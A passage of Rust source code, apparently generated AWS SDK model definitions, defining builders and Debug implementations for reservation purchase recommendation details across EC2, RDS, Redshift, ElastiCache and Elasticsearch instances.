            input: impl Into<std::string::String>,
        ) -> Self {
            self.minimum_number_of_instances_used_per_hour = Some(input.into());
            self
        }
        /// Sets the minimum number of instances used per hour directly from an optional value.
        pub fn set_minimum_number_of_instances_used_per_hour(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.minimum_number_of_instances_used_per_hour = input;
            self
        }
        /// <p>The minimum number of normalized units that you used in an hour during the historical
        /// period. Amazon Web Services uses this to calculate your recommended reservation
        /// purchases.</p>
        pub fn minimum_normalized_units_used_per_hour(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.minimum_normalized_units_used_per_hour = Some(input.into());
            self
        }
        /// Sets the minimum normalized units used per hour directly from an optional value.
        pub fn set_minimum_normalized_units_used_per_hour(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.minimum_normalized_units_used_per_hour = input;
            self
        }
        /// <p>The maximum number of instances that you used in an hour during the historical period.
        /// Amazon Web Services uses this to calculate your recommended reservation
        /// purchases.</p>
        pub fn maximum_number_of_instances_used_per_hour(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.maximum_number_of_instances_used_per_hour = Some(input.into());
            self
        }
        /// Sets the maximum number of instances used per hour directly from an optional value.
        pub fn set_maximum_number_of_instances_used_per_hour(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.maximum_number_of_instances_used_per_hour = input;
            self
        }
        /// <p>The maximum number of normalized units that you used in an hour during the historical
        /// period. Amazon Web Services uses this to calculate your recommended reservation
        /// purchases.</p>
        pub fn maximum_normalized_units_used_per_hour(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.maximum_normalized_units_used_per_hour = Some(input.into());
            self
        }
        /// Sets the maximum normalized units used per hour directly from an optional value.
        pub fn set_maximum_normalized_units_used_per_hour(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.maximum_normalized_units_used_per_hour = input;
            self
        }
        /// <p>The average number of instances that you used in an hour during the historical period.
        /// Amazon Web Services uses this to calculate your recommended reservation
        /// purchases.</p>
        pub fn average_number_of_instances_used_per_hour(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.average_number_of_instances_used_per_hour = Some(input.into());
            self
        }
        /// Sets the average number of instances used per hour directly from an optional value.
        pub fn set_average_number_of_instances_used_per_hour(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.average_number_of_instances_used_per_hour = input;
            self
        }
        /// <p>The average number of normalized units that you used in an hour during the historical
        /// period. Amazon Web Services uses this to calculate your recommended reservation
        /// purchases.</p>
        pub fn average_normalized_units_used_per_hour(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.average_normalized_units_used_per_hour = Some(input.into());
            self
        }
        /// Sets the average normalized units used per hour directly from an optional value.
        pub fn set_average_normalized_units_used_per_hour(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.average_normalized_units_used_per_hour = input;
            self
        }
        /// <p>The average utilization of your instances. Amazon Web Services uses this to calculate
        /// your recommended reservation purchases.</p>
        pub fn average_utilization(mut self, input: impl Into<std::string::String>) -> Self {
            self.average_utilization = Some(input.into());
            self
        }
        /// Sets the average utilization directly from an optional value.
        pub fn set_average_utilization(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.average_utilization = input;
            self
        }
        /// <p>How long Amazon Web Services estimates that it takes for this instance to start saving
        /// you money, in months.</p>
        pub fn estimated_break_even_in_months(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.estimated_break_even_in_months = Some(input.into());
            self
        }
        /// Sets the estimated break-even period (in months) directly from an optional value.
        pub fn set_estimated_break_even_in_months(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_break_even_in_months = input;
            self
        }
        /// <p>The currency code that Amazon Web Services used to calculate the costs for this
        /// instance.</p>
        pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
            self.currency_code = Some(input.into());
            self
        }
        /// Sets the currency code directly from an optional value.
        pub fn set_currency_code(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.currency_code = input;
            self
        }
        /// <p>How much Amazon Web Services estimates that this specific recommendation could save you
        /// in a month.</p>
        pub fn estimated_monthly_savings_amount(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.estimated_monthly_savings_amount = Some(input.into());
            self
        }
        /// Sets the estimated monthly savings amount directly from an optional value.
        pub fn set_estimated_monthly_savings_amount(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_monthly_savings_amount = input;
            self
        }
        /// <p>How much Amazon Web Services estimates that this specific recommendation could save you
        /// in a month, as a percentage of your overall costs.</p>
        pub fn estimated_monthly_savings_percentage(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.estimated_monthly_savings_percentage = Some(input.into());
            self
        }
        /// Sets the estimated monthly savings percentage directly from an optional value.
        pub fn set_estimated_monthly_savings_percentage(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_monthly_savings_percentage = input;
            self
        }
        /// <p>How much Amazon Web Services estimates that you spend on On-Demand Instances in a
        /// month.</p>
        pub fn estimated_monthly_on_demand_cost(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.estimated_monthly_on_demand_cost = Some(input.into());
            self
        }
        /// Sets the estimated monthly On-Demand cost directly from an optional value.
        pub fn set_estimated_monthly_on_demand_cost(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_monthly_on_demand_cost = input;
            self
        }
        /// <p>How much Amazon Web Services estimates that you would have spent for all usage during
        /// the specified historical period if you had a reservation.</p>
        pub fn estimated_reservation_cost_for_lookback_period(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.estimated_reservation_cost_for_lookback_period = Some(input.into());
            self
        }
        /// Sets the estimated reservation cost for the lookback period directly from an optional value.
        pub fn set_estimated_reservation_cost_for_lookback_period(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_reservation_cost_for_lookback_period = input;
            self
        }
        /// <p>How much purchasing this instance costs you upfront.</p>
        pub fn upfront_cost(mut self, input: impl Into<std::string::String>) -> Self {
            self.upfront_cost = Some(input.into());
            self
        }
        /// Sets the upfront cost directly from an optional value.
        pub fn set_upfront_cost(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.upfront_cost = input;
            self
        }
        /// <p>How much purchasing this instance costs you on a monthly basis.</p>
        pub fn recurring_standard_monthly_cost(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.recurring_standard_monthly_cost = Some(input.into());
            self
        }
        /// Sets the recurring standard monthly cost directly from an optional value.
        pub fn set_recurring_standard_monthly_cost(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.recurring_standard_monthly_cost = input;
            self
        }
        /// Consumes the builder and constructs a [`ReservationPurchaseRecommendationDetail`](crate::model::ReservationPurchaseRecommendationDetail)
        pub fn build(self) -> crate::model::ReservationPurchaseRecommendationDetail {
            crate::model::ReservationPurchaseRecommendationDetail {
                account_id: self.account_id,
                instance_details: self.instance_details,
                recommended_number_of_instances_to_purchase: self
                    .recommended_number_of_instances_to_purchase,
                recommended_normalized_units_to_purchase: self
                    .recommended_normalized_units_to_purchase,
                minimum_number_of_instances_used_per_hour: self
                    .minimum_number_of_instances_used_per_hour,
                minimum_normalized_units_used_per_hour: self.minimum_normalized_units_used_per_hour,
                maximum_number_of_instances_used_per_hour: self
                    .maximum_number_of_instances_used_per_hour,
                maximum_normalized_units_used_per_hour: self.maximum_normalized_units_used_per_hour,
                average_number_of_instances_used_per_hour: self
                    .average_number_of_instances_used_per_hour,
                average_normalized_units_used_per_hour: self.average_normalized_units_used_per_hour,
                average_utilization: self.average_utilization,
                estimated_break_even_in_months: self.estimated_break_even_in_months,
                currency_code: self.currency_code,
                estimated_monthly_savings_amount: self.estimated_monthly_savings_amount,
                estimated_monthly_savings_percentage: self.estimated_monthly_savings_percentage,
                estimated_monthly_on_demand_cost: self.estimated_monthly_on_demand_cost,
                estimated_reservation_cost_for_lookback_period: self
                    .estimated_reservation_cost_for_lookback_period,
                upfront_cost: self.upfront_cost,
                recurring_standard_monthly_cost: self.recurring_standard_monthly_cost,
            }
        }
    }
}
impl ReservationPurchaseRecommendationDetail {
    /// Returns a fresh builder-style object that can be used to manufacture a
    /// [`ReservationPurchaseRecommendationDetail`](crate::model::ReservationPurchaseRecommendationDetail).
    pub fn builder() -> crate::model::reservation_purchase_recommendation_detail::Builder {
        std::default::Default::default()
    }
}
/// <p>Details about the instances that Amazon Web Services recommends that you
/// purchase.</p>
///
/// NOTE(review): presumably at most one of these service-specific variants is
/// populated per recommendation — confirm against the service documentation.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct InstanceDetails {
    /// <p>The Amazon EC2 instances that Amazon Web Services recommends that you purchase.</p>
    pub ec2_instance_details: std::option::Option<crate::model::Ec2InstanceDetails>,
    /// <p>The Amazon RDS instances that Amazon Web Services recommends that you purchase.</p>
    pub rds_instance_details: std::option::Option<crate::model::RdsInstanceDetails>,
    /// <p>The Amazon Redshift instances that Amazon Web Services recommends that you
    /// purchase.</p>
    pub redshift_instance_details: std::option::Option<crate::model::RedshiftInstanceDetails>,
    /// <p>The ElastiCache instances that Amazon Web Services recommends that you purchase.</p>
    pub elasti_cache_instance_details:
        std::option::Option<crate::model::ElastiCacheInstanceDetails>,
    /// <p>The Amazon ES instances that Amazon Web Services recommends that you purchase.</p>
    pub es_instance_details: std::option::Option<crate::model::EsInstanceDetails>,
}
impl std::fmt::Debug for InstanceDetails {
    /// Renders each service-specific detail field by name, matching the output
    /// of a derived `Debug` implementation.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("InstanceDetails")
            .field("ec2_instance_details", &self.ec2_instance_details)
            .field("rds_instance_details", &self.rds_instance_details)
            .field("redshift_instance_details", &self.redshift_instance_details)
            .field(
                "elasti_cache_instance_details",
                &self.elasti_cache_instance_details,
            )
            .field("es_instance_details", &self.es_instance_details)
            .finish()
    }
}
/// See [`InstanceDetails`](crate::model::InstanceDetails)
pub mod instance_details {
    /// A builder for [`InstanceDetails`](crate::model::InstanceDetails)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) ec2_instance_details: std::option::Option<crate::model::Ec2InstanceDetails>,
        pub(crate) rds_instance_details: std::option::Option<crate::model::RdsInstanceDetails>,
        pub(crate) redshift_instance_details:
            std::option::Option<crate::model::RedshiftInstanceDetails>,
        pub(crate) elasti_cache_instance_details:
            std::option::Option<crate::model::ElastiCacheInstanceDetails>,
        pub(crate) es_instance_details: std::option::Option<crate::model::EsInstanceDetails>,
    }
    impl Builder {
        /// <p>The Amazon EC2 instances that Amazon Web Services recommends that you purchase.</p>
        pub fn ec2_instance_details(mut self, input: crate::model::Ec2InstanceDetails) -> Self {
            self.ec2_instance_details = Some(input);
            self
        }
        /// Sets the EC2 instance details directly from an optional value
        /// (passing `None` clears any previously set value).
        pub fn set_ec2_instance_details(
            mut self,
            input: std::option::Option<crate::model::Ec2InstanceDetails>,
        ) -> Self {
            self.ec2_instance_details = input;
            self
        }
        /// <p>The Amazon RDS instances that Amazon Web Services recommends that you purchase.</p>
        pub fn rds_instance_details(mut self, input: crate::model::RdsInstanceDetails) -> Self {
            self.rds_instance_details = Some(input);
            self
        }
        /// Sets the RDS instance details directly from an optional value.
        pub fn set_rds_instance_details(
            mut self,
            input: std::option::Option<crate::model::RdsInstanceDetails>,
        ) -> Self {
            self.rds_instance_details = input;
            self
        }
        /// <p>The Amazon Redshift instances that Amazon Web Services recommends that you
        /// purchase.</p>
        pub fn redshift_instance_details(
            mut self,
            input: crate::model::RedshiftInstanceDetails,
        ) -> Self {
            self.redshift_instance_details = Some(input);
            self
        }
        /// Sets the Redshift instance details directly from an optional value.
        pub fn set_redshift_instance_details(
            mut self,
            input: std::option::Option<crate::model::RedshiftInstanceDetails>,
        ) -> Self {
            self.redshift_instance_details = input;
            self
        }
        /// <p>The ElastiCache instances that Amazon Web Services recommends that you purchase.</p>
        pub fn elasti_cache_instance_details(
            mut self,
            input: crate::model::ElastiCacheInstanceDetails,
        ) -> Self {
            self.elasti_cache_instance_details = Some(input);
            self
        }
        /// Sets the ElastiCache instance details directly from an optional value.
        pub fn set_elasti_cache_instance_details(
            mut self,
            input: std::option::Option<crate::model::ElastiCacheInstanceDetails>,
        ) -> Self {
            self.elasti_cache_instance_details = input;
            self
        }
        /// <p>The Amazon ES instances that Amazon Web Services recommends that you purchase.</p>
        pub fn es_instance_details(mut self, input: crate::model::EsInstanceDetails) -> Self {
            self.es_instance_details = Some(input);
            self
        }
        /// Sets the Amazon ES instance details directly from an optional value.
        pub fn set_es_instance_details(
            mut self,
            input: std::option::Option<crate::model::EsInstanceDetails>,
        ) -> Self {
            self.es_instance_details = input;
            self
        }
        /// Consumes the builder and constructs a [`InstanceDetails`](crate::model::InstanceDetails)
        pub fn build(self) -> crate::model::InstanceDetails {
            crate::model::InstanceDetails {
                ec2_instance_details: self.ec2_instance_details,
                rds_instance_details: self.rds_instance_details,
                redshift_instance_details: self.redshift_instance_details,
                elasti_cache_instance_details: self.elasti_cache_instance_details,
                es_instance_details: self.es_instance_details,
            }
        }
    }
}
impl InstanceDetails {
    /// Returns a fresh builder-style object that can be used to manufacture an
    /// [`InstanceDetails`](crate::model::InstanceDetails).
    pub fn builder() -> crate::model::instance_details::Builder {
        std::default::Default::default()
    }
}
/// <p>Details about the Amazon ES instances that Amazon Web Services recommends that you
/// purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct EsInstanceDetails {
    /// <p>The class of instance that Amazon Web Services recommends.</p>
    pub instance_class: std::option::Option<std::string::String>,
    /// <p>The size of instance that Amazon Web Services recommends.</p>
    pub instance_size: std::option::Option<std::string::String>,
    /// <p>The Amazon Web Services Region of the recommended reservation.</p>
    pub region: std::option::Option<std::string::String>,
    /// <p>Determines whether the recommendation is for a current-generation instance.</p>
    /// Defaults to `false` when not set via the builder.
    pub current_generation: bool,
    /// <p>Determines whether the recommended reservation is size flexible.</p>
    /// Defaults to `false` when not set via the builder.
    pub size_flex_eligible: bool,
}
impl std::fmt::Debug for EsInstanceDetails {
    /// Renders all fields by name, matching the output of a derived `Debug`.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("EsInstanceDetails")
            .field("instance_class", &self.instance_class)
            .field("instance_size", &self.instance_size)
            .field("region", &self.region)
            .field("current_generation", &self.current_generation)
            .field("size_flex_eligible", &self.size_flex_eligible)
            .finish()
    }
}
/// See [`EsInstanceDetails`](crate::model::EsInstanceDetails)
pub mod es_instance_details {
    /// A builder for [`EsInstanceDetails`](crate::model::EsInstanceDetails)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) instance_class: std::option::Option<std::string::String>,
        pub(crate) instance_size: std::option::Option<std::string::String>,
        pub(crate) region: std::option::Option<std::string::String>,
        pub(crate) current_generation: std::option::Option<bool>,
        pub(crate) size_flex_eligible: std::option::Option<bool>,
    }
    impl Builder {
        /// <p>The class of instance that Amazon Web Services recommends.</p>
        pub fn instance_class(mut self, input: impl Into<std::string::String>) -> Self {
            self.instance_class = Some(input.into());
            self
        }
        /// Sets the instance class directly from an optional value
        /// (passing `None` clears any previously set value).
        pub fn set_instance_class(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.instance_class = input;
            self
        }
        /// <p>The size of instance that Amazon Web Services recommends.</p>
        pub fn instance_size(mut self, input: impl Into<std::string::String>) -> Self {
            self.instance_size = Some(input.into());
            self
        }
        /// Sets the instance size directly from an optional value.
        pub fn set_instance_size(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.instance_size = input;
            self
        }
        /// <p>The Amazon Web Services Region of the recommended reservation.</p>
        pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
            self.region = Some(input.into());
            self
        }
        /// Sets the Region directly from an optional value.
        pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.region = input;
            self
        }
        /// <p>Determines whether the recommendation is for a current-generation instance.</p>
        pub fn current_generation(mut self, input: bool) -> Self {
            self.current_generation = Some(input);
            self
        }
        /// Sets the current-generation flag directly from an optional value.
        pub fn set_current_generation(mut self, input: std::option::Option<bool>) -> Self {
            self.current_generation = input;
            self
        }
        /// <p>Determines whether the recommended reservation is size flexible.</p>
        pub fn size_flex_eligible(mut self, input: bool) -> Self {
            self.size_flex_eligible = Some(input);
            self
        }
        /// Sets the size-flexibility flag directly from an optional value.
        pub fn set_size_flex_eligible(mut self, input: std::option::Option<bool>) -> Self {
            self.size_flex_eligible = input;
            self
        }
        /// Consumes the builder and constructs a [`EsInstanceDetails`](crate::model::EsInstanceDetails)
        pub fn build(self) -> crate::model::EsInstanceDetails {
            crate::model::EsInstanceDetails {
                instance_class: self.instance_class,
                instance_size: self.instance_size,
                region: self.region,
                // Unset boolean flags fall back to `false` via unwrap_or_default.
                current_generation: self.current_generation.unwrap_or_default(),
                size_flex_eligible: self.size_flex_eligible.unwrap_or_default(),
            }
        }
    }
}
impl EsInstanceDetails {
    /// Returns a fresh builder-style object that can be used to manufacture an
    /// [`EsInstanceDetails`](crate::model::EsInstanceDetails).
    pub fn builder() -> crate::model::es_instance_details::Builder {
        std::default::Default::default()
    }
}
/// <p>Details about the Amazon ElastiCache instances that Amazon Web Services recommends that
/// you purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ElastiCacheInstanceDetails {
    /// <p>The instance family of the recommended reservation.</p>
    pub family: std::option::Option<std::string::String>,
    /// <p>The type of node that Amazon Web Services recommends.</p>
    pub node_type: std::option::Option<std::string::String>,
    /// <p>The Amazon Web Services Region of the recommended reservation.</p>
    pub region: std::option::Option<std::string::String>,
    /// <p>The description of the recommended reservation.</p>
    pub product_description: std::option::Option<std::string::String>,
    /// <p>Determines whether the recommendation is for a current generation instance.</p>
    /// Defaults to `false` when not set via the builder.
    pub current_generation: bool,
    /// <p>Determines whether the recommended reservation is size flexible.</p>
    /// Defaults to `false` when not set via the builder.
    pub size_flex_eligible: bool,
}
impl std::fmt::Debug for ElastiCacheInstanceDetails {
    /// Renders all fields by name, matching the output of a derived `Debug`.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("ElastiCacheInstanceDetails")
            .field("family", &self.family)
            .field("node_type", &self.node_type)
            .field("region", &self.region)
            .field("product_description", &self.product_description)
            .field("current_generation", &self.current_generation)
            .field("size_flex_eligible", &self.size_flex_eligible)
            .finish()
    }
}
/// See [`ElastiCacheInstanceDetails`](crate::model::ElastiCacheInstanceDetails)
pub mod elasti_cache_instance_details {
    /// A builder for [`ElastiCacheInstanceDetails`](crate::model::ElastiCacheInstanceDetails)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) family: std::option::Option<std::string::String>,
        pub(crate) node_type: std::option::Option<std::string::String>,
        pub(crate) region: std::option::Option<std::string::String>,
        pub(crate) product_description: std::option::Option<std::string::String>,
        pub(crate) current_generation: std::option::Option<bool>,
        pub(crate) size_flex_eligible: std::option::Option<bool>,
    }
    impl Builder {
        /// <p>The instance family of the recommended reservation.</p>
        pub fn family(mut self, input: impl Into<std::string::String>) -> Self {
            self.family = Some(input.into());
            self
        }
        /// Sets the instance family directly from an optional value
        /// (passing `None` clears any previously set value).
        pub fn set_family(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.family = input;
            self
        }
        /// <p>The type of node that Amazon Web Services recommends.</p>
        pub fn node_type(mut self, input: impl Into<std::string::String>) -> Self {
            self.node_type = Some(input.into());
            self
        }
        /// Sets the node type directly from an optional value.
        pub fn set_node_type(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.node_type = input;
            self
        }
        /// <p>The Amazon Web Services Region of the recommended reservation.</p>
        pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
            self.region = Some(input.into());
            self
        }
        /// Sets the Region directly from an optional value.
        pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.region = input;
            self
        }
        /// <p>The description of the recommended reservation.</p>
        pub fn product_description(mut self, input: impl Into<std::string::String>) -> Self {
            self.product_description = Some(input.into());
            self
        }
        /// Sets the product description directly from an optional value.
        pub fn set_product_description(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.product_description = input;
            self
        }
        /// <p>Determines whether the recommendation is for a current generation instance.</p>
        pub fn current_generation(mut self, input: bool) -> Self {
            self.current_generation = Some(input);
            self
        }
        /// Sets the current-generation flag directly from an optional value.
        pub fn set_current_generation(mut self, input: std::option::Option<bool>) -> Self {
            self.current_generation = input;
            self
        }
        /// <p>Determines whether the recommended reservation is size flexible.</p>
        pub fn size_flex_eligible(mut self, input: bool) -> Self {
            self.size_flex_eligible = Some(input);
            self
        }
        /// Sets the size-flexibility flag directly from an optional value.
        pub fn set_size_flex_eligible(mut self, input: std::option::Option<bool>) -> Self {
            self.size_flex_eligible = input;
            self
        }
        /// Consumes the builder and constructs a [`ElastiCacheInstanceDetails`](crate::model::ElastiCacheInstanceDetails)
        pub fn build(self) -> crate::model::ElastiCacheInstanceDetails {
            crate::model::ElastiCacheInstanceDetails {
                family: self.family,
                node_type: self.node_type,
                region: self.region,
                product_description: self.product_description,
                // Unset boolean flags fall back to `false` via unwrap_or_default.
                current_generation: self.current_generation.unwrap_or_default(),
                size_flex_eligible: self.size_flex_eligible.unwrap_or_default(),
            }
        }
    }
}
impl ElastiCacheInstanceDetails {
/// Creates a new builder-style object to manufacture [`ElastiCacheInstanceDetails`](crate::model::ElastiCacheInstanceDetails)
pub fn builder() -> crate::model::elasti_cache_instance_details::Builder {
crate::model::elasti_cache_instance_details::Builder::default()
}
}
/// <p>Details about the Amazon Redshift instances that Amazon Web Services recommends that
/// you purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RedshiftInstanceDetails {
    /// <p>The instance family of the recommended reservation.</p>
    pub family: std::option::Option<std::string::String>,
    /// <p>The type of node that Amazon Web Services recommends.</p>
    pub node_type: std::option::Option<std::string::String>,
    /// <p>The Amazon Web Services Region of the recommended reservation.</p>
    pub region: std::option::Option<std::string::String>,
    /// <p>Determines whether the recommendation is for a current-generation instance.</p>
    pub current_generation: bool,
    /// <p>Determines whether the recommended reservation is size flexible.</p>
    pub size_flex_eligible: bool,
}
impl std::fmt::Debug for RedshiftInstanceDetails {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained `DebugStruct` builder; output is identical to the
        // statement-per-field form.
        f.debug_struct("RedshiftInstanceDetails")
            .field("family", &self.family)
            .field("node_type", &self.node_type)
            .field("region", &self.region)
            .field("current_generation", &self.current_generation)
            .field("size_flex_eligible", &self.size_flex_eligible)
            .finish()
    }
}
/// See [`RedshiftInstanceDetails`](crate::model::RedshiftInstanceDetails)
pub mod redshift_instance_details {
    /// A builder for [`RedshiftInstanceDetails`](crate::model::RedshiftInstanceDetails)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) family: std::option::Option<std::string::String>,
        pub(crate) node_type: std::option::Option<std::string::String>,
        pub(crate) region: std::option::Option<std::string::String>,
        pub(crate) current_generation: std::option::Option<bool>,
        pub(crate) size_flex_eligible: std::option::Option<bool>,
    }
    impl Builder {
        /// <p>The instance family of the recommended reservation.</p>
        pub fn family(mut self, input: impl Into<std::string::String>) -> Self {
            self.family = Some(input.into());
            self
        }
        /// <p>The instance family of the recommended reservation.</p>
        pub fn set_family(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.family = input;
            self
        }
        /// <p>The type of node that Amazon Web Services recommends.</p>
        pub fn node_type(mut self, input: impl Into<std::string::String>) -> Self {
            self.node_type = Some(input.into());
            self
        }
        /// <p>The type of node that Amazon Web Services recommends.</p>
        pub fn set_node_type(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.node_type = input;
            self
        }
        /// <p>The Amazon Web Services Region of the recommended reservation.</p>
        pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
            self.region = Some(input.into());
            self
        }
        /// <p>The Amazon Web Services Region of the recommended reservation.</p>
        pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.region = input;
            self
        }
        /// <p>Determines whether the recommendation is for a current-generation instance.</p>
        pub fn current_generation(mut self, input: bool) -> Self {
            self.current_generation = Some(input);
            self
        }
        /// <p>Determines whether the recommendation is for a current-generation instance.</p>
        pub fn set_current_generation(mut self, input: std::option::Option<bool>) -> Self {
            self.current_generation = input;
            self
        }
        /// <p>Determines whether the recommended reservation is size flexible.</p>
        pub fn size_flex_eligible(mut self, input: bool) -> Self {
            self.size_flex_eligible = Some(input);
            self
        }
        /// <p>Determines whether the recommended reservation is size flexible.</p>
        pub fn set_size_flex_eligible(mut self, input: std::option::Option<bool>) -> Self {
            self.size_flex_eligible = input;
            self
        }
        /// Consumes the builder and constructs a [`RedshiftInstanceDetails`](crate::model::RedshiftInstanceDetails)
        pub fn build(self) -> crate::model::RedshiftInstanceDetails {
            crate::model::RedshiftInstanceDetails {
                family: self.family,
                node_type: self.node_type,
                region: self.region,
                // Booleans that were never set default to `false`.
                current_generation: self.current_generation.unwrap_or_default(),
                size_flex_eligible: self.size_flex_eligible.unwrap_or_default(),
            }
        }
    }
}
impl RedshiftInstanceDetails {
    /// Creates a new builder-style object to manufacture [`RedshiftInstanceDetails`](crate::model::RedshiftInstanceDetails)
    pub fn builder() -> crate::model::redshift_instance_details::Builder {
        crate::model::redshift_instance_details::Builder::default()
    }
}
/// <p>Details about the Amazon RDS instances that Amazon Web Services recommends that you
/// purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RdsInstanceDetails {
    /// <p>The instance family of the recommended reservation.</p>
    pub family: std::option::Option<std::string::String>,
    /// <p>The type of instance that Amazon Web Services recommends.</p>
    pub instance_type: std::option::Option<std::string::String>,
    /// <p>The Amazon Web Services Region of the recommended reservation.</p>
    pub region: std::option::Option<std::string::String>,
    /// <p>The database engine that the recommended reservation supports.</p>
    pub database_engine: std::option::Option<std::string::String>,
    /// <p>The database edition that the recommended reservation supports.</p>
    pub database_edition: std::option::Option<std::string::String>,
    /// <p>Determines whether the recommendation is for a reservation in a single Availability
    /// Zone or a reservation with a backup in a second Availability Zone.</p>
    pub deployment_option: std::option::Option<std::string::String>,
    /// <p>The license model that the recommended reservation supports.</p>
    pub license_model: std::option::Option<std::string::String>,
    /// <p>Determines whether the recommendation is for a current-generation instance. </p>
    pub current_generation: bool,
    /// <p>Determines whether the recommended reservation is size flexible.</p>
    pub size_flex_eligible: bool,
}
impl std::fmt::Debug for RdsInstanceDetails {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained `DebugStruct` builder; output is identical to the
        // statement-per-field form.
        f.debug_struct("RdsInstanceDetails")
            .field("family", &self.family)
            .field("instance_type", &self.instance_type)
            .field("region", &self.region)
            .field("database_engine", &self.database_engine)
            .field("database_edition", &self.database_edition)
            .field("deployment_option", &self.deployment_option)
            .field("license_model", &self.license_model)
            .field("current_generation", &self.current_generation)
            .field("size_flex_eligible", &self.size_flex_eligible)
            .finish()
    }
}
/// See [`RdsInstanceDetails`](crate::model::RdsInstanceDetails)
pub mod rds_instance_details {
    /// A builder for [`RdsInstanceDetails`](crate::model::RdsInstanceDetails)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) family: std::option::Option<std::string::String>,
        pub(crate) instance_type: std::option::Option<std::string::String>,
        pub(crate) region: std::option::Option<std::string::String>,
        pub(crate) database_engine: std::option::Option<std::string::String>,
        pub(crate) database_edition: std::option::Option<std::string::String>,
        pub(crate) deployment_option: std::option::Option<std::string::String>,
        pub(crate) license_model: std::option::Option<std::string::String>,
        pub(crate) current_generation: std::option::Option<bool>,
        pub(crate) size_flex_eligible: std::option::Option<bool>,
    }
    impl Builder {
        /// <p>The instance family of the recommended reservation.</p>
        pub fn family(mut self, input: impl Into<std::string::String>) -> Self {
            self.family = Some(input.into());
            self
        }
        /// <p>The instance family of the recommended reservation.</p>
        pub fn set_family(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.family = input;
            self
        }
        /// <p>The type of instance that Amazon Web Services recommends.</p>
        pub fn instance_type(mut self, input: impl Into<std::string::String>) -> Self {
            self.instance_type = Some(input.into());
            self
        }
        /// <p>The type of instance that Amazon Web Services recommends.</p>
        pub fn set_instance_type(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.instance_type = input;
            self
        }
        /// <p>The Amazon Web Services Region of the recommended reservation.</p>
        pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
            self.region = Some(input.into());
            self
        }
        /// <p>The Amazon Web Services Region of the recommended reservation.</p>
        pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.region = input;
            self
        }
        /// <p>The database engine that the recommended reservation supports.</p>
        pub fn database_engine(mut self, input: impl Into<std::string::String>) -> Self {
            self.database_engine = Some(input.into());
            self
        }
